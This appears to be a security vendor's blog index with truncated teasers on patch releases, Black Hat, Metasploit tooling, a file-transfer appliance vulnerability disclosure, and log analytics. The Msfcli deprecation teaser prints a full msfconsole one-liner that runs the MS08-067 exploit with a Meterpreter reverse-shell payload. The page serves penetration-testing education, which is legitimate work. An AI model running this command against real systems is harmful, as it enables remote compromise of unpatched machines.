2 min
Patch Tuesday, July 2015
Administrators and security teams are in for a hectic week tackling 14
Microsoft security
bulletins, 2 Adobe updates addressing 4
CVEs for Flash\Shockwave and Oracle has released their quarterly update for 63
of
their product suites (including Java, Oracle DB, MySQL and Solaris).
Of the 14 Microsoft security bulletins, 4 re
7 min
Events
The Black Hat Attendee Guide Part 2 - The Briefings
If you are just joining us, this is the second post in the series starting here
.
Content is king. Research is what binds us, and you should not be surprised that
some of the best in the game focus their annual research calendar on the Black
Hat USA CFP. Offensive security research is the tail that wags the dog—many
vendors and architects spend the year trying to get back in front of some of the
bombs dropped at Black Hat each year.
There's a
4 min
The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 1
Hi everyone,
Today, I'd like to debut a completely rewritten new cool toy for Metasploit:
Browser Autopwn 2. Browser Autopwn is the easiest and quickest way to explicitly
test browser vulnerabilities without having the user to painfully learn
everything there is about each exploit and the remote target before deployment.
In this blog post, I will provide an introduction on the tool. And then in my
next one, I will explain how you can take advantage of it to maximize your vuln
validation or pen
7 min
Web Application Security Scanning and the Art of Automation
A version of this blog was originally posted on Nov. 5, 2012.
Few people fully appreciate the difficulty in creating a web application
security scanner that can actually
work well against most sites. In addition, there is much debate about how much
application security testing can be automated and how much needs be done by
human hands. Let's look at a recent conversation
among some industry
exp
3 min
Events
The Black Hat Attendee Guide, Part 1 - How to Survive Black Hat
If you're like me, you have wanted to go to Black Hat
for ages. If you're going, have a game plan. For
first timers, this series will be a primer full of guidance and survival tips.
For returning attendees, this will help maximize your experience at Black Hat.
First, I want to give you perspective on my bias, coloring guidance offered
here. My slant is that of someone who was a booth babe (sales engineer), a
speaker, an attendee, Review Board member and former Gen
4 min
Vulnerability Disclosure
R7-2015-08: Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)
This disclosure covers two issues discovered with the Accellion
File Transfer Appliance, a device used for secure
enterprise file transfers. Issue R7-2015-08.1 is a remote file disclosure
vulnerability, and issue R7-2015-08.2 is remote command execution vulnerability.
Metasploit modules have been released for both issues, as of Pull Request 5694
.
According to the vendor, both issues were addressed in version
1 min
Msfcli is No Longer Available in Metasploit
Hi everyone,
This January, we made an announcement about the deprecation of Msfcli, the
command line interface version for Metasploit. Today we are ready to say
good-bye to it. Instead of Msfcli, we recommend using the -x option in
Msfconsole. For example, here's how you can run MS08-067 in one line:
./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; run"
You can also leverage things like resource scripts o
4 min
IT Ops
Ditch the Debugger and Use Log Analysis Instead
This guest blog post is written by Matthew Skelton, Co-founder and Principal
Consultant at Skelton Thatcher Consulting.
--------------------------------------------------------------------------------
Summary: As a Developer, you cannot attach the debugger to your application in
Production, but you can use logging in a way that helps you easily diagnose
problems in both development AND Production. You also get to make friends with
Operations people – win! The applications we’re developing and
1 min
IT Ops
10 Best Practices for Log Management & Analytics: Part 1
This 3-part series covers Logentries’ 10 best practices for log management and
analytics. To download the complete article, click here
.
As applications, hosting environments and infrastructure continue to grow in
size and complexity, having a well defined set of logging strategies and
practices is more important than ever.
In Logentri
2 min
IT Ops
Using Log Data Streams for Real-Time Analytics: Part 1
This 3-part series explores the definition and benefits of using log data
streams and real-time analytics for some common IT Ops uses cases. To download
the complete article,click here
.
Analytics tools are often focused on analyzing historical data. Taking a sample
of data from historical events, you can perform calculations to determine what
happened during that period of time and report on you
6 min
IT Ops
How to Implement ANTLR4 Autocomplete
Antlr4 is a new iteration of a popular Antlr parse tree
generator. Antlr4 features great documentation
and an in-depth book
on the
subject. However, the topic of autocompletion lacks any substantive material. I
hope this article will steer you in the right direction if you are looking to
implement autocomplete functionality
3 min
Metasploit Weekly Wrapup
Weekly Metasploit Wrapup: Two More Flash Exploits
While Adobe has made great progress in releasing both regular and emergency updates to Flash, it's becoming clear that Flash itself is becoming an albatross around the neck of every browser.
1 min
Discover Assets Dynamically with Infoblox DHCP
A highlight of the Nexpose 5.15 release is the addition of Infoblox Trinzic DDI
to the growing list of Dynamic Discovery sources. With nearly 8,000 customers
worldwide, Infoblox is a market leader in DNS, DHCP and IP address management.
Building upon existing support for Microsoft DHCP log monitoring, released this
past spring, Nexpose customers that use Infoblox to manage DHCP activity can now
detect previously unknown devices whenever they connect to the network,
providing a more complete un
2 min
IT Ops
Announcing Logentries as Google Cloud Platform's First Log Analytics Partner
Today we’re excited to announce
our partnership with Google Cloud Platform, making Logentries
the first provider of log analytics for Google Cloud
customers.
Logentries’ Google Cloud integration enables Google customers to perform
advanced analysis on their log data,
3 min
IT Ops
Introducing Logentries NEW Query Language: LEQL
We are excited to announce that Logentries’ new SQL-like query language, LEQL,
is now available
for more advanced analytics and easy extraction of valuable insights from your
log data.
A SQL-Like Query Language
If you’ve ever used SQL, LEQL should feel familiar. In fact, Logentries already
supports a number of SQL-like search functions, including:
* SUM: Sums a set of values
*